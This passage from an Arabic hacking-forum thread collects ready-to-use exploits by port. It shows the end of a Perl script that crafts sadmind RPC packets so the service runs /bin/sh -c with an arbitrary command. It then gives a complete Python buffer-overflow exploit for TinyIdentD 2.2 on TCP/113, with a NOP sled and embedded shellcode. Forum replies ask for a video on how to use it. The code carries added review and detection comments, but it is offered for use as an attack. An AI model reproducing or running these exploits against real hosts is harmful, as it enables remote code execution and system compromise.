"\x00\x00\x00\x0a\x00\x00\x00\x11\x00\x00\x00\x1e".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00".

"\x00\x00\x00\x3b". $packed_host.

"\x00\x00\x00\x00\x06" . "system".

"\x00\x00\x00\x00\x00\x15". "../../../../../bin/sh". "\x00\x00\x00";

# Append Body Length ^-- Here

# Body: a sequence of length-prefixed ADM_* keys, each followed by a
# length-prefixed value. ADM_METHOD carries $buf1; ADM_FENCE carries "-c" and
# then $command in a 512-byte zero-padded slot.
my $body =
"\x00\x00\x00\x0e". "ADM_FW_VERSION".
"\x00\x00\x00\x00\x00\x03\x00\x00\x00\x04\x00\x00".
"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00".

"\x00\x00\x00\x08". "ADM_LANG".
"\x00\x00\x00\x09\x00\x00\x00\x02\x00\x00".
"\x00\x01". "C" .
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".

"\x00\x00\x00\x0d". "ADM_REQUESTID".
"\x00\x00\x00\x00\x00\x00\x09\x00\x00\x00\x12\x00\x 00\x00\x11".
"00009:000000000:0"."\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00".

"\x00\x00\x00\x09". "ADM_CLASS".
"\x00\x00\x00\x00\x00\x00\x09\x00\x00\x00\x07".
"\x00\x00\x00\x06" . "system" .
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".


"\x00\x00\x00\x0e" . "ADM_CLASS_VERS" .
"\x00\x00\x00\x00\x00\x09\x00\x00\x00\x04".
"\x00\x00\x00\x03". "2.1".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00".


"\x00\x00\x00\x0a" . "ADM_METHOD" .
"\x00\x00\x00\x00\x00\x09" . pack("N", length($buf1)+1) . pack("N", length($buf1)) . $buf1 .
"\x00\x00\x00\x00\x00\x00\x00\x00".

"\x00\x00\x00\x08". "ADM_HOST" .
"\x00\x00\x00\x09\x00\x00\x00\x3c\x00\x00\x00\x3b".
$packed_host.

"\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x0f". "ADM_CLIENT_HOST".
"\x00\x00\x00\x00\x09".

pack("N", length($hostname) + 1) .
pack("N", length($hostname)) .
$rpc_hostname .
"\x00\x00\x00\x00". "\x00\x00\x00\x00".

"\x00\x00\x00\x11" . "ADM_CLIENT_DOMAIN".
"\x00\x00\x00\x00\x00\x00\x09\x00\x00\x00\x01\x00\x 00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00".

"\x00\x00\x00\x11" . "ADM_TIMEOUT_PARMS".
"\x00\x00\x00\x00\x00".
"\x00\x09\x00\x00\x00\x1c".
"\x00\x00\x00\x1b" . "TTL=0 PTO=20 PCNT=2 PDLY=30".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00".


"\x00\x00\x00\x09" . "ADM_FENCE" .
"\x00\x00\x00\x00\x00\x00\x09\x00\x00\x00\x00\x00\x 00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x01\x58\x00\x00\x00\x00\x 00\x00\x09\x00".
"\x00\x00\x03\x00\x00\x00\x02" . "-c" .
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x 00\x01\x59\x00".
"\x00\x00\x00\x00\x00\x09\x00\x00\x02\x01\x00\x00\x 02\x00".

# A $command longer than 512 bytes gives a negative repeat count (no padding).
$command . ("\x00" x (512 - length($command))).

"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10".
"netmgt_endofargs";

# Length word inserted between header and body (see "Append Body Length" above).
my $res = $rpc . $header . pack("N", (length($body) + 4 + length($header)) - 330) . $body;

return($res);

}

# Unbuffered STDOUT so progress output is not held back.
$|=1;

# Main: two passes ($i = 1, then 2). Each pass re-resolves the sadmind port via
# the portmapper on UDP/111 (program 100232, version 10), sends one datagram
# built by rpc_sadmin_expl, waits up to 4 s for any reply and discards it.
# Pass 1 sends the short 50-byte ADM_METHOD value, pass 2 the full buffer.
# NOTE(review): a lookup failure exits with status 0, so a wrapper cannot tell
# failure from success by exit code.
my $portmap = "111";
for (my $i=1;$i<3;$i++) {
my $target_port = rpc_getport($host, $portmap, 100232, 10);
if (! $target_port)
{
print STDERR "Error: could not determine port used by sadmind\n";
exit(0);
}

my $s = rpc_socket($host, $target_port);
my $x = rpc_sadmin_expl("localhost", "foo", $i);
print $s $x;
my $r = rpc_read($s);
close ($s);
}

# [2008-10-19]


انتهينا من بورت 111
نبدأ بـ بورت 113


113 TinyIdentD <= 2.2 Remote Buffer Overflow Exploit



#
#tinyidentd exploit code by
#thomas . pollet _at_ gmail . com
#bug by Maarten Boone
#
#usage: python exploit.py [target]
#
# Python 2 script (print statement, str used as bytes). It sends one line to
# TCP/113 on the target and exits without reading a reply. After the 'XXXX'
# marker is replaced the line is 519 bytes plus '\n' (the 523 budget below
# still counts the four marker bytes that replace() removes).
# Detection note: a ~520-byte line containing non-printable bytes on TCP/113
# is the wire-level indicator.
import socket,sys
#jmp into nop sled
payload = '\xeb\x20'
#ident crap
payload += ', 28 : USERID : UNIX : '
#nop sled
payload +='XXXX'
# jmp *%esi
payload += '\x77\x13\x83\x7c' #XP kernel32.dll  -- hard-coded for one specific build, per this comment
#payload += '\xb1\x63\xd9\x77' #W2K rpcrt4.dll
#metasploit alphanumeric shellcode calc.exe
shellcode = "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x 49\x49\x49\x49"
shellcode += "\x49\x49\x48\x49\x49\x49\x49\x49\x49\x49\x49\x49\x 51\x5a\x6a\x44"
shellcode += "\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x54\x42\x32\x 41\x42\x32\x42"
shellcode += "\x41\x30\x42\x41\x58\x41\x50\x38\x41\x42\x75\x4a\x 49\x69\x6c\x4b"
shellcode += "\x58\x51\x54\x65\x50\x57\x70\x45\x50\x4e\x6b\x67\x 35\x35\x6c\x4e"
shellcode += "\x6b\x73\x4c\x55\x55\x71\x68\x67\x71\x68\x6f\x6c\x 4b\x52\x6f\x46"
shellcode += "\x78\x4e\x6b\x51\x4f\x71\x30\x74\x41\x7a\x4b\x30\x 49\x6c\x4b\x54"
shellcode += "\x74\x6e\x6b\x76\x61\x4a\x4e\x35\x61\x4b\x70\x6a\x 39\x4c\x6c\x4d"
shellcode += "\x54\x6b\x70\x30\x74\x54\x47\x6a\x61\x6a\x6a\x64\x 4d\x63\x31\x79"
shellcode += "\x52\x4a\x4b\x69\x64\x67\x4b\x32\x74\x65\x74\x66\x 64\x31\x65\x4a"
shellcode += "\x45\x6c\x4b\x71\x4f\x31\x34\x57\x71\x48\x6b\x52\x 46\x6e\x6b\x64"
shellcode += "\x4c\x52\x6b\x4e\x6b\x31\x4f\x77\x6c\x54\x41\x68\x 6b\x4c\x4b\x57"
shellcode += "\x6c\x6c\x4b\x57\x71\x4a\x4b\x4e\x69\x41\x4c\x65\x 74\x67\x74\x4a"
shellcode += "\x63\x75\x61\x4f\x30\x51\x74\x6c\x4b\x61\x50\x50\x 30\x4f\x75\x4f"
shellcode += "\x30\x32\x58\x64\x4c\x4c\x4b\x71\x50\x54\x4c\x4c\x 4b\x70\x70\x57"
shellcode += "\x6c\x4e\x4d\x6e\x6b\x73\x58\x35\x58\x4a\x4b\x36\x 69\x6c\x4b\x4d"
shellcode += "\x50\x4c\x70\x67\x70\x75\x50\x37\x70\x4c\x4b\x45\x 38\x35\x6c\x41"
shellcode += "\x4f\x57\x41\x68\x76\x53\x50\x30\x56\x6e\x69\x6b\x 48\x6f\x73\x6f"
shellcode += "\x30\x63\x4b\x62\x70\x30\x68\x58\x70\x6f\x7a\x57\x 74\x51\x4f\x45"
shellcode += "\x38\x6f\x68\x59\x6e\x4f\x7a\x66\x6e\x62\x77\x69\x 6f\x38\x67\x73"
shellcode += "\x53\x52\x41\x30\x6c\x71\x73\x64\x6e\x35\x35\x30\x 78\x70\x65\x45"
shellcode += "\x50\x44"

# Padding so that payload (with marker) + sled + shellcode total 523 bytes; a
# negative nopsize would make range() empty and the line longer than intended.
nopsize=523-len(payload)-len(shellcode)
nopsled=''
for i in range(nopsize):
    nopsled+='\x90'

# The marker is replaced, not appended.
payload=payload.replace('XXXX',nopsled+shellcode)

# NOTE(review): the bare except swallows every failure (missing argument, name
# resolution error, connection refused, reset) and reports all of them as a
# usage error, so 'done' is the only signal that the send completed.
try:
    target=sys.argv[1]
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((target,113))
    s.send(payload+'\n')
    s.close()
    print 'done'
except:
    print 'usage : %s [target]'%sys.argv[0]

# [2007-05-14]


انتهينا من البورتات 105 و 110 و 111 و 113

ارجو حفظ الحقوق لجيوش الهكر

تحياتي

almagid500
10-08-2013, 09:32 PM
حرام عليكم، بقلب الصفحة ومش فاهم حاجة، طب فهموني الله

ARABIC
10-28-2013, 12:08 AM
يعطيك العافية اخي الكريم

هكر مصر
11-15-2013, 05:58 PM
أرجو منك إضافة شرح فيديو لكيفية استغلالها، أنا بصراحة مفهمتش حاجة
:d